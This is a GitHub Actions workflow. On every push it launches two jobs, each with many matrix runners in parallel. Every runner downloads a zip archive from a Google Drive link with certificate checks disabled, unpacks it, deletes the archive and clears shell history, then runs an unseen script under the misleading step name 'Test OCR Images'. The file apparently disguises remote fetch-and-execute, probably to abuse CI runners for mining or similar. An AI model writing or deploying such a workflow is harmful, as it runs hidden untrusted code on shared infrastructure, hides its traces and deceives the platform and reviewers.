name: ketnoi7dev
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  CREATE:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Setup', 'Compile', 'Validate', 'Execute', 'Release']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1hIzXw3z1zWmkGv8Lh1IZZQLZA663-kDH" -O ketnoi7dev.zip
        unzip -o ketnoi7dev.zip
        rm ketnoi7dev.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  SETUP1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Prepare', 'Construct', 'Inspect', 'Activate', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1hIzXw3z1zWmkGv8Lh1IZZQLZA663-kDH" -O ketnoi7dev.zip
        unzip -o ketnoi7dev.zip
        rm ketnoi7dev.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
